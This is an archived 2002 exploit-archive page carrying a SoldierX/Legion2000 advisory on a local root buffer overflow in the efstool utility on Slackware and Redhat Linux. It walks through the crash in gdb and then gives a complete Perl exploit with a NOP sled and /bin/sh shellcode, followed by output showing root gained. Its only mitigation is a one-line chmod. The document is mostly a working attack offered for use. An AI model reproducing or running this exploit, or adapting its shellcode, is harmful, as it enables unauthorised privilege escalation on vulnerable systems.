what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

efstool.txt

efstool.txt
Posted Sep 12, 2002
Authored by NTFX | Site soldierx.com

Efstool local root exploit. A condition has been found in efstool which is shipped with Redhat and Slackware linux (and possibly other distributions) which, given the right environment, root privileges can be gained. Full research provided.

tags | exploit, local, root
systems | linux, redhat, slackware
SHA-256 | 35749dc21ecb4aaf67c6b4d31e62c494ff815452e4240da1bf2a8f9647bb5cab

efstool.txt

Change Mirror Download
               §+++++++++++++++++++++++++++++++++++++++++++++++§
]|[ [-=- SOLDIERX.COM Presents -=-] ]|[
+++++++++++++++§+++_________________________________________+++§+++++++++++++++
\\//////////////// EFSTOOL LOCAL ROOT EXPLOIT \\\\\\\\\\\\\\\\//
\\\\\\\\\\\\\\\\\______________SLACKWARELINUX_____________/////////////////
\\:::::::::::::::::::::::::::::::: by ::::::::::::::::::::::::::::::::://
\\xxxxxxxxxxxxxxxxxxxxxxxx§-=-][-NTFX-][-=-§xxxxxxxxxxxxxxxxxxxxxxxxx//
\\:::::::::::::::::::::::::::::: of ::::::::::::::::::::::::::::::://
\\ SOLDIERX.COM, LEGION2000 //
\\ September, 2002 //
\\ NOBODY CAN STOP INFORMATION INSEMINATION //
§=+++++++++++++++++++++++++++++++++++++++++++++++++++++++++=§
[ Author's E-mail - NTFX@SOLDIERX.COM ]
**********************************************************************
| The author hereby grants permission to reproduce, redistribute, |
| or include this file(s) in your file section, electronic or print |
| newletter, or any other form of transmission that you choose, as |
| long as it is kept intact and whole, with no ommissions, delet- |
| ions, or changes. (C)2002 SOLDIERX.COM - http://www.soldierx.com |
**********************************************************************

[L2K Advisory ef0001]
Feb 13th 02
EFSTOOL LOCAL ROOT
Author: ntfx <ntfx@legion2000.tk>
Legion2000 Security Research (c)
Soldierx Dot Com (c)
Web: http://legion200.security.nu
Web: http://soldierx.com
Note: i have previously not written any
advisories so be patient.

What is Bonobo (contains the efstool package)

Bonobo is a set of language and system independant CORBA interfaces
for creating reusable components, controls and creating compound documents.

The Bonobo distribution includes a Gtk+ based implementation of the
Bonobo interfaces, enabling developers to create reusable
components and applications that can be used to form more complex documents.

There has been found a condition in efstool which is
shipped with redhat linux / slackware linux and possibly
others which given the right environment root
privilages can be gained. Dependant on suid permissions.

If a user prints 3000 "A" to the buffer this will
seg fault the program as shown below.

$ /usr/bin/efstool `perl -e 'print "A" x 3000'`
Segmentation fault

Now we proceed to open gdb on the item to view
what may have occured.

$gdb /usr/bin/efstool
GNU gdb 5.0
Copyright 2000 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you
are
welcome to change it and/or distribute copies of it under certain
conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for
details.
This GDB was configured as "i386-slackware-linux"...
(no debugging symbols found)...
(gdb) r `perl -e 'print "A" x 3000'`
Starting program: /usr/bin/efstool `perl -e 'print "A" x 3000'`
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) info reg esp
esp 0xbfffe890 0xbfffe890
(gdb)

Here as you can see we are able to gain the return address.
Return : 0xbfffe890
when we get to the return address it will return to the nops and
continue down the code which will this execute a shell in our exploit.

The offset has to be played with for the exploit to work
effeciently but a offset of around -1000 / -2000 should
work.

I have done minimal testing on this, So if it doesnt work fully
do not come crying to me. It has been tested on slackware 7.1

Solution to this : remove suid permissions on the program
#chmod u-s efstool

added: Do not confuse this with the other efstool release, Our version was semi released
back in Feb 13th when the original discovery took place, I personally
do not like using security focus for releases or have ever previously
bothered with it. - ntfx 10.09

Included is the example exploit.
--------------------------cut kitkat.pl---------------------------------
#!/usr/bin/perl
# Efstool local root exploits (Slackware 8.1)
# Author: ntfx <ntfx@legion2000.tk> Feb 13th 2002
# Legion2000 Security Research (c)
# Soldierx Dot Com
# WEB: HTTP://legion2000.security.nu
# WEB: HTTP://soldierx.com
# GREET: Legion2000SR, Soldierx.com, Kat
############################################
# Solution: chmod u-s efstool
############################################
if(! $ARGV[0])
{
&usage;
exit;
}

sub usage() {
print "USAGE: perl $0 <offset> kat\n";
print "efstool local root by ntfx\n";
print "Legion2000SR http://legion2000.security.nu\n";
print "Soldierx http://soldierx.com\n";
exit(0);
}

$ret = "0xbfffe890";
$offset = $ARGV[0];
$nop = "\x90";
$ev1lc0de = "\xeb\x1d\x5e\x29\xc0\x88\x46\x07\x89".
"\x46\x0c\x89\x76\x08\xb0\x0b\x87\xf3".
"\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\x29".
"\xc0\x40\xcd\x80\xe8\xde\xff\xff\xff".
"/bin/sh";

if ($ARGV[1] eq "kat") {
$len = 3000;
for ($i = 0; $i < ($len - length($ev1lc0de)); $i++) {
$buffer .= $nop;
}
$buffer .= $ev1lc0de;
}
$buffer .= pack('l', ($ret + $offset));
$buffer .= pack('l', ($ret + $offset));

# You will now be privilaged..
exec("/usr/bin/efstool $buffer");
sleep 2;
system("id; uname -a");
# This has been a SoldierX/Legion2000 Production.
--------------------------cut kitkat.pl---------------------------------

$ perl kitkat.pl kat
uid=0(root) gid=100(users) groups=100(users)
Linux efstool-exp 2.2.21 #1 Thu Jun 13 03:57:27 BST 2002 i586 unknown
#

As you can see root privilages have been gained and with the system exec it displays
the proven root uid and uname of the system.

ntfx <ntfx@legion2000.tk>
_____________________________________________________________________
§=------------------------------]-§-[------------------------------=§
\\ THIS FILE WAS A SOLDIERX PRODUCTION //
\\ http://www.soldierx.com //
\\ NOBODY CAN STOP INFORMATION INSEMINATION //
§=+++++++++++++++++++++++++++++++++++++++++++++++++++++++++=§
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    0 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close